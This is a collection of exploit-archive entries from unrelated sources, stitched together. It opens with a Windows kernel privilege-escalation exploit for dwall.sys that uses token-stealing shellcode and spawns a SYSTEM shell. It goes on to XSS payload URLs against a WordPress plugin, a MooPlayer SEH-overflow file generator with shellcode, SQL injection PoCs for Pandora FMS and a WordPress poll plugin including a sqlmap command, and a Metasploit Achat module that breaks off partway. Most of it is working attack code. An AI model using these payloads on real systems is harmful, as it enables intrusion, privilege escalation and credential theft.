  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x5b,                                                  // pop ebx                        Restores ebx
  0x5a,                                                  // pop edx                        Restores edx
  0xc2,0x08                                              // ret 8                          Away from the kernel    
};



DWORD HalDispatchTableAddress() 
{
    _NtQuerySystemInformation    NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
    DWORD                        HalDispatchTable;
    CHAR                         kFullName[256];
    PVOID                        kBase = NULL;
    LPSTR                        kName;
    HMODULE                      Kernel;
    FUNCTPTR                     Hal;
    ULONG                        len;
    NTSTATUS                     status;


    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
 	
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;  
    }

    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);

    if (!status) 
    {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
        return -1;
    }
		
    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);

    if(pModuleInfo == NULL)
    {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return -1;
    }

    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
	
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;

    printf("[i] Kernel base name %s\n", kFullName);
    kName = strrchr(kFullName, '\\');

    Kernel = LoadLibraryA(++kName);

    if(Kernel == NULL) 
    {
        printf("[-] Failed to load kernel base\n\n");
        return -1;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");

    if(Hal == NULL)
    {
        printf("[-] Failed to find HalDispatchTable\n\n");
        return -1;
    }
    
    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
    printf("[i] Kernel handle 0x%08x\n", Kernel);
    printf("[i] Kernel base address 0x%08x\n", kBase);          

    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);

    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

    if(!HalDispatchTable)
    {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return -1;
    }

    return HalDispatchTable;
}


int GetWindowsVersion()
{
    int v = 0;
    DWORD version = 0, minVersion = 0, majVersion = 0;

    version = GetVersion();

    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    majVersion = (DWORD)(LOBYTE(LOWORD(version)));

    if (minVersion == 1 && majVersion == 5) v = 1;  // "Windows XP;
    if (minVersion == 1 && majVersion == 6) v = 2;  // "Windows 7";
    if (minVersion == 2 && majVersion == 5) v = 3;  // "Windows Server 2003;

    return v;
}


void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    si.cb          = sizeof(si); 
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
        return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}



int main(int argc, char *argv[]) 
{

    _NtQueryIntervalProfile     NtQueryIntervalProfile;
    LPVOID                      input[1] = {0};    
    LPVOID                      addrtoshell;
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;
    DWORD                       HalDispatchTableTarget;
    ULONG                       time = 0;
    unsigned char               devhandle[MAX_PATH]; 


    printf("-------------------------------------------------------------------------------\n");
    printf("    SoftSphere DefenseWall FW/HIPS (dwall.sys) Arbitrary Write EoP Exploit     \n");
    printf("                         Tested on Windows XP SP3 (32bit)                      \n");
    printf("-------------------------------------------------------------------------------\n\n");

    if (GetWindowsVersion() == 1) 
    {
        printf("[i] Running Windows XP\n");
    }

    if (GetWindowsVersion() == 0) 
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }  

    sprintf(devhandle, "\\\\.\\%s", "dwall");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
 	
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;  
    }
   
    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
                    
    printf("[+] Input buffer contents %08x\n", input[0]);
 	
    printf("[~] Press any key to send Exploit  . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00222000, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

    printf("[+] Buffer sent\n");
    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    NtQueryIntervalProfile(2, &time);
    spawnShell();

    return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/49197/info

WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]
HireHackking 
#!/usr/bin/env python
#################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow      #
# Date Discovered: 10-02-2015                                   #
# Author: dogo h@ck                                             #
# Vulnerable Software: Moo player 1.3.0                         #
# Software Link: https://mooplayer.jaleco.com/                  #
# Version: 1.3.0                                                #
# Tested On: Windows XP SP3                                     #
#################################################################
#BadCharacters = ("\x00\x0a\x0d")                               #
#################################################################

head="http://"
buffer=10000
junk = "\x41" * 264
nseh = "\xeb\x06\x90\x90" 
seh = "\xe2\x69\xc8\x74"  #74C869E2 OLEACC.dll || Path=C:\WINDOWS\system32\OLEACC.dll

# Windows XP SP3 English MessageBoxA Shellcode

shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x20\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" # 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" # 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0")

poc = head + junk + nseh + seh + shellcode
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "payload.m3u"
f=open(file,"w")
f.write(head + poc);
f.close();
HireHackking 
Document Title:
===============
Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1355


Release Date:
=============
2015-02-09


Vulnerability Laboratory ID (VL-ID):
====================================
1355


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement 
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ 
new technology market. 

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.


    * Get SNMP Traps from generic network devices. 
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module. 
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction. 
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerability in the official Pandora FMS monitoring web-application.


Vulnerability Disclosure Timeline:
==================================
2015-02-09:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Artica Sulociones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows remote attackers and low privileged application user accounts to unauthorized execute sql commands 
that compromise the affected monitoring web-application and dbms.

The vulnerability is located in the offset value of the index list context module. Remote attackers and low privileged application 
user accounts are able to execute own sql commands via GET method request. The attacker can prepare a request through the `agentes` 
module to inject own sql commands on the affected web-application dbms.

The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 6.3.
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] agentes
				[+] agents_modules

Vulnerable Parameter(s):
				[+] offset


Proof of Concept (PoC):
=======================
The sql injection web vulnerabilities can be exploited by local low privileged application user accounts in godmode without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60
http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--


--- SQL Error Session Logs ---
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 1 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 28 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY utimestamp DESC LIMIT 10' at line 4 ('SELECT * FROM tevento WHERE id_agente = -1' AND estado <> 1 ORDER BY utimestamp DESC LIMIT 10') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ('SELECT notinit_count FROM tagente WHERE id_agente = -1'') in /var/www/html/pandora/include/db/mysql.php


PoC: Exploit (html & js)

<html>
<head><body>
<title>Pandora FMS - SQL Injection Exploit</title>
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60>
<iframe src=http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
</head></body>
</html>

... or

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EPandora%20FMS%20-%20SQL%20Injection%20Exploit%3C/title%3E%0A%3Ciframe%20src%3D
http%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26refr%3D60%26group_id%3D0%26search%3D%26sort_field%3D
%26sort%3Dnone%26status%3D0%26offset%3D-1%2527-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D2592000%26refresh%3DRefresh%2520path%26offset%3D-1%2527-%5B
SQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26
group_id%3D0%26search%3D%26sort_field%3D%26sort%3Dnone%26status%3D-1%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%26refr%3D60%3E%0A%3Ciframe%20src%3Dhttp%3A
//fms.localhost%3A8080/pandora/index.php%3F%26sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D-%5BSQL%20INJECTION%20
VULNERABILITY%21%5D%27--%26refresh%3D%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
sec%3Destado%26sec2%3Doperation/agentes


Reference(s):
http://fms.localhost:8080/pandora/index.php
http://fms.localhost:8080/pandora/include/db/mysql.php


Solution - Fix & Patch:
=======================
The issue can be patched by implementation of a prepared statement thats prevents the execution of sql commands through the weak values.
Encode and parse the vulnerable `offset` value in  all the marked moduzles to prevent further executions or information disclosure.


Security Risk:
==============
The security risk of the remote sql injection vulnerabilitiy in the pandora fms application is estimated as high. (CVSS 6.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH 



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
#################################################################
# Exploit Title : Wordpress Survey and poll Blind SQL Injection

# Data : 2015 – 02 - 11

# Exploit Author : Securely (Yoo Hee man)

# Plugin : WordPress Survey and Poll

# Vender Homepage : http://modalsurvey.sympies.com

# Tested On : Windows XP / sqlmap_v1.0

# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip
                  https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on)

1. Detail 
- This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php
- Settings.php file is no login cookie check
- "survey_id" variable is not sanitized


#################################################################
public function ajax_survey()
    {
		global $wpdb;
		$survey_id = "";
		$survey_name = "";
		$survey_start_time = "";
		$survey_expiry_time = "";
		$survey_global = "";
		if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);
		else $survey_id = "";
		if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);
		else $survey_name = "";
		if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));
		else $survey_start_time = "";
		if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));
		else $survey_expiry_time = "";
		if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);
		else $survey_global = "";
		if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);
		else $survey_options = "";
		if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);
		else $survey_qa = "";
		$survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);
		if ($_REQUEST['sspcmd']=="save")
		{
		if ($survey_check>0) {
		//update survey
			$wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'count' => $oans[1],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die("updated");
		}
		else {
		//insert survey
			$wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 
				'id' => $survey_id, 
				'name' => $survey_name, 
				'options' => $survey_options, 
				'start_time' => $survey_start_time,
				'expiry_time'=> $survey_expiry_time,
				'global'=> $survey_global
				) );
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die('success');
		}
################################################################

2. POC
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]

3. Sqlmap
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql


3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                   god2zuzu@naver.com
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
        sending a crafted message to the default port 9256 it's possible to overwrites the
        SEH handler. Even when the exploit is reliable it depends of timing since there are
        two threads overflowing the stack in the same time. This module has been tested on
        Windows XP SP3 and Windows 7.
      },
      'Author'         =>
        [
          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
        ],
      'License'	       => MSF_LICENSE,
      'References'     =>
        [
          ['CWE', '121'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'    => 730,
          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK Windows XP SP3, Windows 7
          # Not working on Windows Server 2003
          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
